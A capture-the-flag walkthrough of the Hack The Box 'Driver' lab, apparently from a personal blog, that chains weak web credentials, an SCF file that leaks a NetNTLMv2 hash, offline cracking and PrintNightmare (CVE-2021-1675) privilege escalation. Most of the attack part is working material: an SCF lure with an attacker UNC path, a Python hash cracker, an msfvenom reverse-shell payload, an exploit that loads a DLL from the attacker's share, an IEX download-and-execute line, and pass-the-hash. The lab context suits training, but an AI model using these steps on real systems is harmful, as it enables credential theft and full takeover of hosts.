Lluna's Pure land.


HTB-driver

0x00. Overview

0x01. Information gathering

The scan shows port 80 open together with the sensitive ports 135 (MSRPC) and 445 (SMB). The -sC default scripts also tried a guest login against SMB (smb-security-mode reports account_used: guest), but no anonymous share access is available on this host. Two details worth keeping in mind for later: SMB signing is enabled but not required, and the target's clock is about 7 hours ahead of the attacker's.

┌──(root💀kali)-[~/htb/driver]
└─# nmap -sC -sV -sT -A 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 23:50 EST
Nmap scan report for driver.htb (10.10.11.106)
Host is up (0.63s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|Vista|7|10 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 10 1511 - 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-10T11:51:38
|_ start_date: 2021-11-10T04:56:00

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 711.49 ms 10.10.16.1
2 711.54 ms driver.htb (10.10.11.106)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.21 seconds

0x02. Port 80

Visiting port 80 shows that HTTP Basic authentication is required before any resource is served.

The weak credentials admin:admin log in successfully. Crawling the site by hand turns up fw_up.php, a firmware update page that accepts file uploads.

0x03. SCF (Shell Command File)

After spending hours trying to upload webshells I gave up... until I reconsidered what I already had: port 445 from the scan, and the firmware-update page talking about a file share. That led me to SCF. An SCF (Shell Command File) is a small INI-style file that Explorer parses as soon as it renders the directory listing; if its IconFile entry points at a UNC path, Windows tries to fetch the icon over SMB and authenticates to that host with the current user's credentials, which leaks a NetNTLM hash to whoever is listening there.

Create a .scf file. The file name starts with @ so that it sorts to the top of the directory listing and is the first thing Explorer renders.

┌──(root💀kali)-[~/htb/driver]
└─# cat @attack.scf
[Shell]
Command=2
IconFile=\\your-ip\share\random.ico
[Taskbar]
Command=ToggleDesktop

The share and file name in IconFile can be anything, even a path that does not exist: the point is only to make the target connect to your host so you can capture its hash.

Run Responder to capture the NetNTLMv2 hash

┌──(root💀kali)-[~/htb/driver/Responder-master]
└─# python2 Responder.py -wrf --lm -v -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 2.3

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Fingerprint hosts [ON]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.2]
Challenge set [1122334455667788]



[+] Listening for events...

Upload @attack.scf and the NetNTLMv2 hash arrives in Responder, giving us the username tony

tony::DRIVER:1122334455667788:CAB4FB213766B6C2B128BA78CAAA28BD:0101000000000000B380F2FC5FD6D701102734F8919D620700000000020000000000000000000000

0x04. Cracking the NetNTLMv2 hash

Either hashcat or john works; the password is liltony

┌──(root💀kali)-[~/htb/driver]
└─# cat hash
tony::DRIVER:1122334455667788:CAB4FB213766B6C2B128BA78CAAA28BD:0101000000000000B380F2FC5FD6D701102734F8919D620700000000020000000000000000000000

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
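The whole SCF-to-password chain above in one script: build the lure, parse the line Responder prints, and run the same NetNTLMv2 check that hashcat -m 5600 performs for every candidate. This is an added example, not code from the original post, from Responder or from hashcat. MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable under OpenSSL 3; the UNC path passed to build_scf and the tiny wordlist are constructed for the demo, while the hash line is the one captured in the post.

```python
"""SCF lure + NetNTLMv2 (hashcat -m 5600) parser and offline verifier.

Added example, not code from the original post, Responder or hashcat.
Assumptions: attacker IP 10.10.16.2 and share name 'share' in the demo call,
and a constructed three-word wordlist. CAPTURED is the line from the post.
"""
import hashlib
import hmac
import struct
from datetime import datetime, timedelta, timezone

MASK = 0xFFFFFFFF

# Captured by Responder in the post (USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB)
CAPTURED = ("tony::DRIVER:1122334455667788:CAB4FB213766B6C2B128BA78CAAA28BD:"
            "0101000000000000B380F2FC5FD6D701102734F8919D620700000000020000000000000000000000")


def build_scf(unc_icon_path):
    """SCF is INI-like; Explorer fetches IconFile while rendering the listing,
    and a UNC path there makes Windows authenticate (NTLM) to that host."""
    return ("[Shell]\r\nCommand=2\r\nIconFile={}\r\n"
            "[Taskbar]\r\nCommand=ToggleDesktop\r\n").format(unc_icon_path)


def md4(data):
    """Pure-Python MD4 (RFC 1320). NT hash = MD4(UTF-16LE(password))."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    fns = (lambda x, y, z: (x & y) | (~x & z),       # F (round 1)
           lambda x, y, z: (x & y) | (x & z) | (y & z),  # G (round 2)
           lambda x, y, z: x ^ y ^ z)                # H (round 3)
    consts = (0, 0x5A827999, 0x6ED9EBA1)
    orders = (list(range(16)),
              [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
              [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
    shifts = ((3, 7, 11, 19), (3, 5, 9, 13), (3, 9, 11, 15))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for rnd in range(3):
            for i in range(16):
                j = (4 - i % 4) % 4                  # update order a, d, c, b
                f = fns[rnd](v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4])
                v[j] = rol((v[j] + f + x[orders[rnd][i]] + consts[rnd]) & MASK,
                           shifts[rnd][i % 4])
        state = [(s + t) & MASK for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def ntlm_hash(password):
    return md4(password.encode("utf-16le"))


def parse_netntlmv2(line):
    """Split a Responder / hashcat 5600 line and decode the useful blob fields."""
    user, _empty, domain, challenge, proof, blob = line.strip().split(":")
    blob_bytes = bytes.fromhex(blob)
    # blob: 4B header, 4B reserved, 8B FILETIME, 8B client challenge, 4B, AV pairs
    filetime = struct.unpack("<Q", blob_bytes[8:16])[0]
    ts = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)
    return {"user": user, "domain": domain,
            "server_challenge": bytes.fromhex(challenge),
            "nt_proof": bytes.fromhex(proof), "blob": blob_bytes,
            "client_challenge": blob_bytes[16:24], "timestamp": ts}


def check_password(entry, password):
    """One hashcat -m 5600 candidate check (MS-NLMP 3.3.2):
    NTOWFv2   = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
    NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob)"""
    ntowf_v2 = hmac.new(ntlm_hash(password),
                        (entry["user"].upper() + entry["domain"]).encode("utf-16le"),
                        hashlib.md5).digest()
    proof = hmac.new(ntowf_v2, entry["server_challenge"] + entry["blob"],
                     hashlib.md5).digest()
    return hmac.compare_digest(proof, entry["nt_proof"])


def crack(line, wordlist):
    """Return the first wordlist entry that reproduces NTProofStr, else None."""
    entry = parse_netntlmv2(line)
    for candidate in wordlist:
        if check_password(entry, candidate):
            return candidate
    return None


if __name__ == "__main__":
    print(build_scf(r"\\10.10.16.2\share\random.ico"))        # assumed attacker host/share
    e = parse_netntlmv2(CAPTURED)
    print(e["user"], e["domain"], e["client_challenge"].hex(), e["timestamp"].isoformat())
    print("cracked:", crack(CAPTURED, ["password", "tony123", "liltony"]))  # constructed list
```

Running it prints the SCF text, the decoded capture (user, domain, client challenge and the FILETIME the client embedded in the blob, which is handy for correlating the SMB session in the target's event logs), and whichever wordlist entry reproduces the captured NTProofStr. The per-candidate cost is one MD4 plus two HMAC-MD5 computations, which is why a rockyou-sized list is still cheap even without hashcat.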

0x05. Exploitation

1. msf auxiliary/scanner/winrm/winrm_cmd

I tried running commands through the auxiliary/scanner/winrm/winrm_cmd module, without success.

2. evil-winrm.rb

./evil-winrm.rb -i 10.10.11.106 -u "tony" -p "liltony"

Read user.txt

3. Reverse shell

First generate the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=5555 -f exe > shell.exe

Upload it and run it

*Evil-WinRM* PS C:\Users\tony\Desktop> upload /root/htb/driver/shell.exe

I tried migrating to another process and escalating from the meterpreter session here, without success

0x06. Privilege escalation with CVE-2021-1675

The web site is a printer firmware portal, so check whether the Print Spooler service is running on the server

Get-Service -Name Spooler

The spooler is running, so it can be targeted

1. First method

CVE-2021-1675.py

First set up an SMB server for the target to fetch the driver DLL from. With Samba, add the configuration below to allow guest (anonymous) access; note that force user = smbuser requires a local Unix account with that name to exist

[global]
client min protocol = CORE
client max protocol = SMB3
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp
guest ok = yes
read only = no
browsable = yes
force user = smbuser

Alternatively, start an SMB server with impacket's smbserver.py (add -smb2support if the Windows host refuses to talk SMB1 to it)

smbserver.py smb /tmp

Generate a DLL payload with Cobalt Strike (CS) and drop it into the shared directory /tmp; CVE-2021-1675.py then makes the target's spooler load the driver DLL from that share.

Point the exploit at driver.dll on the share and the beacon checks in.

python3 CVE-2021-1675.py driver.htb/tony:liltony@10.10.11.106 '\\10.10.16.5\smb\driver.dll'

With SYSTEM you can dump the local account hashes; either crack the NT hash for the cleartext password, or pass the hash straight to Evil-WinRM.

I didn't manage to crack it here!

./evil-winrm.rb -i 10.10.11.106 -u "administrator" -H "d1256cff8b5b5fdb8c327d3b6c3f5017"

2. Second method

CVE-2021-1675.ps1

Use the PowerShell script to create a new local administrator

Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "demo" -NewPassword "demo"

Importing the module fails because the PowerShell execution policy is at its default, which runs no script files at all; bypass that by fetching the script over HTTP and executing it in memory (your_ip is your own host)

IEX(new-object net.webclient).downloadstring('http://your_ip/CVE-2021-1675.ps1')

The user is created successfully

Log in as demo:demo

Read root.txt

------------- Short note, long sentiment; see you next time -------------